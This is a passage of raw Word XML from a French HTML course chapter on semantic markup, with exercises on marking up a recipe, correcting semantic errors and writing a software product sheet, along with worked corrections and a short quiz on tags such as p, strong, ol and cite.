        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chacune a un usage distinct.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Citations, code, dates et abréviations ont des éléments dédiés.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document se relit en justifiant chaque balise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte est structuré. Reste à le relier : les liens constituent l'architecture d'un site et la principale voie de navigation.</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4.1 — Baliser une recette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Voici une recette en texte brut. Structurez-la en HTML sémantique.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Titre « Tarte aux pommes », temps de préparation, liste des ingrédients.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Étapes numérotées, note de conservation, astuce facultative.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 xml:space="preserve">Ajoutez une abréviation et une durée balisée avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 4.2 — Corriger une page truffée d'erreurs sémantiques</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Ce fragment contient six erreurs de sens. Identifiez-les et corrigez-les.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;div class="h1"&gt;Mon titre&lt;/div&gt;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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;p&gt;Première ligne&lt;br&gt;&lt;br&gt;Deuxième paragraphe&lt;/p&gt;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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;b&gt;Avertissement :&lt;/b&gt; ne pas supprimer ce fichier.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;/p&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;i&gt;Le Petit Prince&lt;/i&gt; est un livre de &lt;i&gt;Saint-Exupéry&lt;/i&gt;.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;/p&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;ul&gt;&lt;li&gt;Étape 1&lt;/li&gt;&lt;li&gt;Étape 2&lt;/li&gt;&lt;/ul&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour une procédure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>6.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;p&gt;Prix : 12 kg&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sans espace insécable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 4.3 — Rédiger une fiche technique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Créez la fiche d'un produit logiciel : nom, version, prérequis, installation, avertissement.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Utilisez une liste de définitions pour les caractéristiques.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Placez la commande d'installation dans un bloc de code.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Signalez un avertissement de sécurité avec l'élément approprié.</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4.1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&lt;article&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Tarte aux pommes&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Temps de préparation : &lt;time datetime="PT25M"&gt;25 minutes&lt;/time&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     · Cuisson : &lt;time datetime="PT40M"&gt;40 minutes&lt;/time&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Ingrédients&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;3 pommes&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;1 pâte brisée&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;50 g de sucre&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Préparation&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ol&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Préchauffer le four à 180 °C.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Étaler la pâte dans le moule.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Disposer les pommes et saupoudrer de sucre.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;Enfourner 40 minutes.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ol&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;&lt;small&gt;À conserver deux jours au réfrigérateur.&lt;/small&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La recette est un contenu autonome : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> convient. Les temps de préparation et de cuisson sont des durées, d'où l'usage de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec une valeur ISO 8601 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PT25M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour 25 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La note de conservation est secondaire : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>small</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est approprié. Une astuce facultative pourrait être placée dans un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à l'intérieur de l'article, ce qui la distingue du déroulé principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne peut pas remplacer un titre : la page perd son plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;br&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simule un paragraphe ; il faut deux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne signale pas une importance ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> le fait.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le titre d'une œuvre se balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, le nom de l'auteur reste en texte simple (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Saint-Exupéry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas une œuvre).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une procédure est ordonnée : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">« 12 kg » doit rester insécable : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12&amp;nbsp;kg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 4.3</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&lt;article&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Analyseur de journaux 2.4&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dl&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;dt&gt;Version&lt;/dt&gt;&lt;dd&gt;2.4.1&lt;/dd&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;dt&gt;Licence&lt;/dt&gt;&lt;dd&gt;MIT&lt;/dd&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;dt&gt;Prérequis&lt;/dt&gt;&lt;dd&gt;Python 3.11 ou ultérieur&lt;/dd&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/dl&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Installation&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;pre&gt;&lt;code&gt;python3 -m pip install journalier==2.4.1&lt;/code&gt;&lt;/pre&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;&lt;strong&gt;Attention :&lt;/strong&gt; la commande &lt;code&gt;journalier purge&lt;/code&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     supprime définitivement les archives de plus de trente jours.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La liste de définitions associe chaque caractéristique à sa valeur, ce qui est plus précis qu'une liste à puces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le bloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pre &gt; code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conserve la mise en forme et signale la nature du contenu. Un lecteur d'écran peut alors annoncer « code ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'avertissement utilise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parce qu'il s'agit d'une information dont l'ignorance a des conséquences graves : c'est du sens, non du gras décoratif.</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Quelle balise crée un nouveau paragraphe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&lt;br&gt;</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&lt;p&gt;</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&lt;div&gt;</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&lt;span&gt;</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 xml:space="preserve">Quelle différence sépare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</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Aucune, les deux sont identiques</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strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> exprime une importance sémantique, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> une mise en évidence visuelle</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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> est obsolète</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strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne peut pas être mis en forme</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Quelle liste utiliser pour une recette étape par étape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ul</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ol</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dl</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menu</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 xml:space="preserve">Comment afficher littéralement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans une page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&lt;div&gt;</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&amp;lt;div&amp;gt;</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&lt;code&gt;&lt;div&gt;&lt;/code&gt;</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\&lt;div\&gt;</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Quel élément balise le titre d'une œuvre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i</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cite</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q</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em</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> délimite un paragraphe. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne fait qu'un retour à la ligne dans le même paragraphe ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont des conteneurs génériques.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
